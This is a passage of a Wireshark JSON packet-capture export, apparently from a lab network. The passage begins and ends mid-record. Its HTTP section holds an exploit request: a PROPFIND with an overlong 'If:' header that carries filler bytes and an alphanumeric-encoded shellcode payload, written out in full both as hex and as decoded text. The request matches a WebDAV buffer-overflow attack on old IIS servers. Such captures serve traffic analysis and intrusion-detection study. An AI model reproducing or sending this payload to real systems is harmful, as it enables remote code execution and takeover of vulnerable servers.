"tcp.nxtseq": "1716",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "926029720",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000bed9",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:17:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:17:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868311",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000566000",
|
||
"tcp.analysis.bytes_in_flight": "1715",
|
||
"tcp.analysis.push_bytes_sent": "1715"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.001125000",
|
||
"tcp.time_delta": "0.000066000"
|
||
},
|
||
"tcp.payload": "30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "211",
|
||
"tcp.segment": "212",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1715",
|
||
"tcp.reassembled.data": "50:52:4f:50:46:49:4e:44:20:2f:20:48:54:54:50:2f:31:2e:31:0d:0a:48:6f:73:74:3a:20:31:39:32:2e:31:36:38:2e:36:38:2e:31:0d:0a:55:73:65:72:2d:41:67:65:6e:74:3a:20:4d:6f:7a:69:6c:6c:61:2f:34:2e:30:20:28:63:6f:6d:70:61:74:69:62:6c:65:3b:20:4d:53:49:45:20:36:2e:30:3b:20:57:69:6e:64:6f:77:73:20:4e:54:20:35:2e:31:29:0d:0a:43:6f:6e:74:65:6e:74:2d:4c:65:6e:67:74:68:3a:20:30:0d:0a:49:66:3a:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:56:4f:74:64:50:45:41:65:48:57:56:6c:6a:41:75:44:68:59:57:62:59:51:51:4d:67:66:6d:4c:46:6e:6a:58:4f:57:45:6f:51:53:4b:7a:7a:76:54:77:46:69:71:70:49:67:6c:5a:6e:44:57:61:79:79:53:77:6a:6e:52:4c:71:69:50:58:50:67:74:4e:4a:66:6a:6c:4c:6a:4e:73:51:48:74:44:50:6c:6c:53:6e:70:58:66:72:6f:50:58:53:4e:54:76:4c:47:e6:9d:ae:e6:b1:84:e6:85:88:e6:bd:98:e4:85:93:e5:a1:9a:e5:85:91:e4:89:98:e4:a5:8f:e4:a5:98:e4:b1:82:e6:95:a1:e7:81:ac:e4:ad:85:e6:99:b2:e6:89:b9:c8:82:c8:82:e1:8b:80:e6:a0:83:e4:99:b7:e5:a9:ad:e5:91:b7:e4:9d:89:e4:a5:ba:e5:85:b1:e6:89:95:e5:a1:b6:e7:9d:aa:e5:91:b7:e6:8d:b5:e5:99:ae:e6:a5:95:e4:95:a1:e7:85:b9:e6:b5:a3:e4:9d:90:e6:95:85:e7:99:89:e7:a5:ba:e1:8f:80:e6:a0:83:3e:20:28:4e:6f:74:20:3c:6c:6f:63:6b:74:6f:6b:65:6e:3a:77:72:69:74:65:31:3e:29:20:3c:68:74:74:70:3a:2f:2f:31:39:32:2e:31:36:38:2e:36:38:2e:31:3a:38:30:2f:5a:62:7a:57:46:4e:4f:6a:54:74:79:58:6e:74:57:68:6b:76:44:75:59:51:54:54:48:63:44:4f:77:7a:46:48:58:71:42:6a:6d:46:52:47:5a:68:76:5a:42:79:6e:59:76:4e:61:4b:78:69:63:72:68:46:41:42:4b:6e:69:56:6a:6b:4a:64:4a:45:67:68:64:7a:64:76:43:53:4a:52:52:6d:59:52:53:6a:47:6e:63:61:59:6e:49:68:6c:52:71:4b:4a:4f:46:45:e6:ad:85:e7:8d:84:e6:bd:97:e7:a9:ba:e4:a5:91:e4:b5:87:e6:89:90:e4:95:a8:e7:9d:b0:e7:a9:99:e6:9d:8a:e4:a1:b9:e5:a1:85:e4:b5:8c:e1:8f:80:e6:a0:83:ef:8e:8d:e7:9e:bd:e4:85:a4:e6:99:97:e4:a5:8e:e5:89:8e:e1:8f:80:e6:a0:83:e7:9d:b8:e5:85:8d:e7:91:93:e5:95:ba:e6:a1:95:e5:89:a1:e7:95:ba:e6:a1:b4:e6:82:82:e6:a0:81:eb:81:ac:e7:9e:bc:ef:80:81:e7:9e:be:e2:95:a3:e7:9e:bb:e1:84:94:e7:9e:ba:ef:89:84:e7:9e:bb:e4:85:81:e4:85:81:ee:b8:a2:e7:9e:bb:e9:a0:81:e7:9e:bc:e2:89:a5:e7:9e:be:e2:95:a3:e7:9e:bb:e9:91:af:cf:80:ed:91:81:e7:9e:bd:e4:a3:93:e7:9e:bb:e2:87:a0:e7:9e:bf:ef:84:82:e7:9e:bb:ef:b0:82:e7:9e:bb:ef:80:81:e7:9e:be:e8:b0:84:e7:9e:bd:e8:b0:85:e7:9e:bd:e2:95:a3:e7:9e:bb:e9:91:8f:cf:80:ed:91:81:e7:9e:bd:e8:8a:85:e7:9e:bb:e2:95:a3:e7:9e:bb:e9:82:90:e9:82:90:e6:96:91:e7:9e:be:e5:b9:94:ec:9a:83:e4:84:8a:56:56:59:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:49:41:6a:58:41:51:41:44:41:5a:41:42:41:52:41:4c:41:59:41:49:41:51:41:49:41:51:41:49:41:68:41:41:41:5a:31:41:49:41:49:41:4a:31:31:41:49:41:49:41:42:41:42:41:42:51:49:31:41:49:51:49:41:49:51:49:31:31:31:41:49:41:4a:51:59:41:5a:42:41:42:41:42:41:42:41:42:6b:4d:41:47:42:39:75:34:4a:42:59:6c:48:68:61:72:6d:30:69:70:49:70:53:30:75:39:69:55:4d:61:59:30:71:54:74:4b:42:30:4e:50:52:6b:71:42:4c:4c:42:6b:50:52:4d:44:62:6b:73:42:6c:68:6c:4f:77:47:4d:7a:6d:56:4e:51:6b:4f:54:6c:6d:6c:51:51:71:6c:6c:42:4c:6c:4d:50:47:51:56:6f:5a:6d:6a:61:46:67:58:62:49:62:72:32:4e:77:52:6b:31:42:7a:70:44:4b:6d:7a:4f:4c:74:4b:50:4c:6a:71:71:68:4a:43:61:38:7a:61:38:51:50:51:74:4b:61:49:6d:50:49:71:67:63:74:4b:4d:79:5a:78:6b:33:4d:6a:6e:69:52:6b:4d:64:64:4b:4d:31:36:76:6e:51:59:6f:56:4c:66:61:58:4f:6a:6d:39:71:75:77:50:38:57:70:30:75:6c:36:4c:43:71:6d:39:68:4f:4b:61:6d:4e:44:43:45:47:74:6e:78:42:6b:4f:68:4d:54:4b:51:56:73:32:46:74:4b:4c:4c:50:4b:64:4b:4e:78:4b:6c:59:71:5a:33:74:4b:4c:44:44:4b:59:71:58:50:64:49:71:34:6e:44:6e:44:6f:6b:71:4b:53:31:70:59:31:4a:62:31:79:6f:4b:30:4f:6f:31:4f:51:4a:62:6b:5a:72:48:6b:72:6d:61:4d:62:48:4c:73:4c:72:59:70:6b:50:42:48:52:57:72:53:6c:72:61:4f:31:44:53:38:6e:6c:62:57:6d:56:6b:57:39:6f:48:55:74:78:56:30:4d:31:49:70:79:70:4b:79:69:34:4e:74:62:30:62:48:4e:49:75:30:30:6b:79:70:69:6f:49:45:4e:70:4e:70:50:50:32:30:31:30:32:30:61:30:6e:70:53:38:78:6a:4c:4f:47:6f:67:70:49:6f:77:65:46:37:50:6a:6b:55:53:38:55:70:77:38:31:34:6e:35:50:68:4c:42:69:70:6a:71:71:4c:72:69:58:66:71:5a:6c:50:72:36:62:37:70:68:33:69:74:65:61:64:71:51:4b:4f:77:65:43:55:45:70:64:34:4a:6c:59:6f:70:4e:39:78:62:55:48:6c:30:68:7a:50:57:45:56:42:52:36:79:6f:66:75:30:6a:39:70:51:5a:6b:54:71:46:52:37:6f:78:4b:52:79:49:66:68:6f:6f:39:6f:48:55:44:4b:70:36:33:51:5a:56:70:4b:71:48:30:4f:6e:72:62:6d:6c:4e:32:4a:6d:70:6f:78:4d:30:4e:30:79:70:4b:50:30:51:52:4a:69:70:70:68:70:58:36:44:30:53:6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"http": {
|
||
"PROPFIND / HTTP/1.1\\r\\n": {
|
||
"_ws.expert": {
|
||
"http.chat": "",
|
||
"_ws.expert.message": "PROPFIND / HTTP/1.1\\r\\n",
|
||
"_ws.expert.severity": "2097152",
|
||
"_ws.expert.group": "33554432"
|
||
},
|
||
"http.request.method": "PROPFIND",
|
||
"http.request.uri": "/",
|
||
"http.request.version": "HTTP/1.1"
|
||
},
|
||
"http.host": "192.168.68.1",
|
||
"http.request.line": "Host: 192.168.68.1\r\n",
|
||
"http.user_agent": "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)",
|
||
"http.request.line": "User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)\r\n",
|
||
"http.content_length_header": "0",
|
||
"http.content_length_header_tree": {
|
||
"http.content_length": "0"
|
||
},
|
||
"http.request.line": "Content-Length: 0\r\n",
|
||
"http.request.line": "If: <http://192.168.68.1:80/VOtdPEAeHWVljAuDhYWbYQQMgfmLFnjXOWEoQSKzzvTwFiqpIglZnDWayySwjnRLqiPXPgtNJfjlLjNsQHtDPllSnpXfroPXSNTvLG<4C><47><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> (Not <locktoken:write1>) <http://192.168.68.1:80/ZbzWFNOjTtyXntWhkvDuYQTTHcDOwzFHXqBjmFRGZhvZBynYvNaKxicrhFABKniVjkJdJEghdzdvCSJRRmYRSjGncaYnIhlRqKJOFE<46><45><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>VVYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBYlHharm0ipIpS0u9iUMaY0qTtKB0NPRkqBLLBkPRMDbksBlhlOwGMzmVNQkOTlmlQQqllBLlMPGQVoZmjaFgXbIbr2NwRk1BzpDKmzOLtKPLjqqhJCa8za8QPQtKaImPIqgctKMyZxk3MjniRkMddKM16vnQYoVLfaXOjm9quwP8Wp0ul6LCqm9hOKamNDCEGtnxBkOhMTKQVs2FtKLLPKdKNxKlYqZ3tKLDDKYqXPdIq4nDnDokqKS1pY1Jb1yoK0Oo1OQJbkZrHkrmaMbHLsLrYpkPBHRWrSlraO1DS8nlbWmVkW9oHUtxV0M1IpypKyi4Ntb0bHNIu00kypioIENpNpPP201020a0npS8xjLOGogpIoweF7PjkUS8Upw814n5PhLBipjqqLriXfqZlPr6b7ph3iteadqQKOweCUEpd4JlYopN9xbUHl0hzPWEVBR6yofu0j9pQZkTqFR7oxKRyIfhoo9oHUDKp63QZVpKqH0OnrbmlN2JmpoxM0N0ypKP0QRJipphpX6D0Sk5ioGeBmDX9pkQ9pM0r3R6pPBJKP0Vb3B738KRxYFh1OIoHU9qUsNIUv1ehnQKqIomr5Og4IYOgxLPkPM0yp0kS9RLplaUT22V2UBLD4RUqbs5LqMbOC1Np1gPdjkNUpBU9k1q8oypm19pM0NQyK9rmL9wsYersPK2LOjbklmF4JztkWDFjtmObhMDIwyn90SE7xMa7kKN7PYrmLywcZN4IwSVZtMOqxlTLGIrn4ko1zKdn7P0B5IppEmyBUjEaOUsAA>\r\n",
|
||
"\\r\\n": "",
|
||
"http.request.full_uri": "http://192.168.68.1/",
|
||
"http.request": "1",
|
||
"http.request_number": "1",
|
||
"http.response_in": "214"
|
||
}
|
||
}
|
||
}
|
||
},
|
||
{
|
||
"_index": "packets-2020-07-17",
|
||
"_type": "doc",
|
||
"_score": null,
|
||
"_source": {
|
||
"layers": {
|
||
"frame": {
|
||
"frame.interface_id": "0",
|
||
"frame.interface_id_tree": {
|
||
"frame.interface_name": "\\Device\\NPF_{A3208914-5057-4474-9535-A579B0FE0EE5}"
|
||
},
|
||
"frame.encap_type": "1",
|
||
"frame.time": "Jul 17, 2020 03:19:53.511308000 SE Asia Standard Time",
|
||
"frame.offset_shift": "0.000000000",
|
||
"frame.time_epoch": "1594930793.511308000",
|
||
"frame.time_delta": "0.000010000",
|
||
"frame.time_delta_displayed": "0.007232000",
|
||
"frame.time_relative": "16.762248000",
|
||
"frame.number": "222",
|
||
"frame.len": "331",
|
||
"frame.cap_len": "331",
|
||
"frame.marked": "0",
|
||
"frame.ignored": "0",
|
||
"frame.protocols": "eth:ethertype:ip:tcp:http",
|
||
"frame.coloring_rule.name": "HTTP",
|
||
"frame.coloring_rule.string": "http || tcp.port == 80 || http2"
|
||
},
|
||
"eth": {
|
||
"eth.dst": "00:0c:29:50:92:ec",
|
||
"eth.dst_tree": {
|
||
"eth.dst_resolved": "VMware_50:92:ec",
|
||
"eth.dst.oui": "3113",
|
||
"eth.dst.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:50:92:ec",
|
||
"eth.addr_resolved": "VMware_50:92:ec",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.dst.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.dst.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.src": "00:0c:29:53:25:34",
|
||
"eth.src_tree": {
|
||
"eth.src_resolved": "VMware_53:25:34",
|
||
"eth.src.oui": "3113",
|
||
"eth.src.oui_resolved": "VMware, Inc.",
|
||
"eth.addr": "00:0c:29:53:25:34",
|
||
"eth.addr_resolved": "VMware_53:25:34",
|
||
"eth.addr.oui": "3113",
|
||
"eth.addr.oui_resolved": "VMware, Inc.",
|
||
"eth.src.lg": "0",
|
||
"eth.lg": "0",
|
||
"eth.src.ig": "0",
|
||
"eth.ig": "0"
|
||
},
|
||
"eth.type": "0x00000800"
|
||
},
|
||
"ip": {
|
||
"ip.version": "4",
|
||
"ip.hdr_len": "20",
|
||
"ip.dsfield": "0x00000000",
|
||
"ip.dsfield_tree": {
|
||
"ip.dsfield.dscp": "0",
|
||
"ip.dsfield.ecn": "0"
|
||
},
|
||
"ip.len": "317",
|
||
"ip.id": "0x0000244c",
|
||
"ip.flags": "0x00004000",
|
||
"ip.flags_tree": {
|
||
"ip.flags.rb": "0",
|
||
"ip.flags.df": "1",
|
||
"ip.flags.mf": "0"
|
||
},
|
||
"ip.frag_offset": "0",
|
||
"ip.ttl": "64",
|
||
"ip.proto": "6",
|
||
"ip.checksum": "0x00000c08",
|
||
"ip.checksum.status": "2",
|
||
"ip.src": "192.168.68.21",
|
||
"ip.addr": "192.168.68.21",
|
||
"ip.src_host": "192.168.68.21",
|
||
"ip.host": "192.168.68.21",
|
||
"ip.dst": "192.168.68.1",
|
||
"ip.addr": "192.168.68.1",
|
||
"ip.dst_host": "192.168.68.1",
|
||
"ip.host": "192.168.68.1"
|
||
},
|
||
"tcp": {
|
||
"tcp.srcport": "38739",
|
||
"tcp.dstport": "80",
|
||
"tcp.port": "38739",
|
||
"tcp.port": "80",
|
||
"tcp.stream": "43",
|
||
"tcp.len": "265",
|
||
"tcp.seq": "1449",
|
||
"tcp.seq_raw": "2639005786",
|
||
"tcp.nxtseq": "1714",
|
||
"tcp.ack": "1",
|
||
"tcp.ack_raw": "946676225",
|
||
"tcp.hdr_len": "32",
|
||
"tcp.flags": "0x00000018",
|
||
"tcp.flags_tree": {
|
||
"tcp.flags.res": "0",
|
||
"tcp.flags.ns": "0",
|
||
"tcp.flags.cwr": "0",
|
||
"tcp.flags.ecn": "0",
|
||
"tcp.flags.urg": "0",
|
||
"tcp.flags.ack": "1",
|
||
"tcp.flags.push": "1",
|
||
"tcp.flags.reset": "0",
|
||
"tcp.flags.syn": "0",
|
||
"tcp.flags.fin": "0",
|
||
"tcp.flags.str": "·······AP···"
|
||
},
|
||
"tcp.window_size_value": "502",
|
||
"tcp.window_size": "64256",
|
||
"tcp.window_size_scalefactor": "128",
|
||
"tcp.checksum": "0x0000fb52",
|
||
"tcp.checksum.status": "2",
|
||
"tcp.urgent_pointer": "0",
|
||
"tcp.options": "01:01:08:0a:89:ad:cb:1e:00:00:00:00",
|
||
"tcp.options_tree": {
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.nop": "01",
|
||
"tcp.options.nop_tree": {
|
||
"tcp.option_kind": "1"
|
||
},
|
||
"tcp.options.timestamp": "08:0a:89:ad:cb:1e:00:00:00:00",
|
||
"tcp.options.timestamp_tree": {
|
||
"tcp.option_kind": "8",
|
||
"tcp.option_len": "10",
|
||
"tcp.options.timestamp.tsval": "2309868318",
|
||
"tcp.options.timestamp.tsecr": "0"
|
||
}
|
||
},
|
||
"tcp.analysis": {
|
||
"tcp.analysis.initial_rtt": "0.000517000",
|
||
"tcp.analysis.bytes_in_flight": "1713",
|
||
"tcp.analysis.push_bytes_sent": "1713"
|
||
},
|
||
"Timestamps": {
|
||
"tcp.time_relative": "0.000875000",
|
||
"tcp.time_delta": "0.000010000"
|
||
},
|
||
"tcp.payload": "6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a",
|
||
"tcp.segment_data": "6b:35:69:6f:47:65:42:6d:44:58:39:70:6b:51:39:70:4d:30:72:33:52:36:70:50:42:4a:4b:50:30:56:62:33:42:37:33:38:4b:52:78:59:46:68:31:4f:49:6f:48:55:39:71:55:73:4e:49:55:76:31:65:68:6e:51:4b:71:49:6f:6d:72:35:4f:67:34:49:59:4f:67:78:4c:50:6b:50:4d:30:79:70:30:6b:53:39:52:4c:70:6c:61:55:54:32:32:56:32:55:42:4c:44:34:52:55:71:62:73:35:4c:71:4d:62:4f:43:31:4e:70:31:67:50:64:6a:6b:4e:55:70:42:55:39:6b:31:71:38:6f:79:70:6d:31:39:70:4d:30:4e:51:79:4b:39:72:6d:4c:39:77:73:59:65:72:73:50:4b:32:4c:4f:6a:62:6b:6c:6d:46:34:4a:7a:74:6b:57:44:46:6a:74:6d:4f:62:68:4d:44:49:77:79:6e:39:30:53:45:37:78:4d:61:37:6b:4b:4e:37:50:59:72:6d:4c:79:77:63:5a:4e:34:49:77:53:56:5a:74:4d:4f:71:78:6c:54:4c:47:49:72:6e:34:6b:6f:31:7a:4b:64:6e:37:50:30:42:35:49:70:70:45:6d:79:42:55:6a:45:61:4f:55:73:41:41:3e:0d:0a:0d:0a"
|
||
},
|
||
"tcp.segments": {
|
||
"tcp.segment": "221",
|
||
"tcp.segment": "222",
|
||
"tcp.segment.count": "2",
|
||
"tcp.reassembled.length": "1713",
|
||
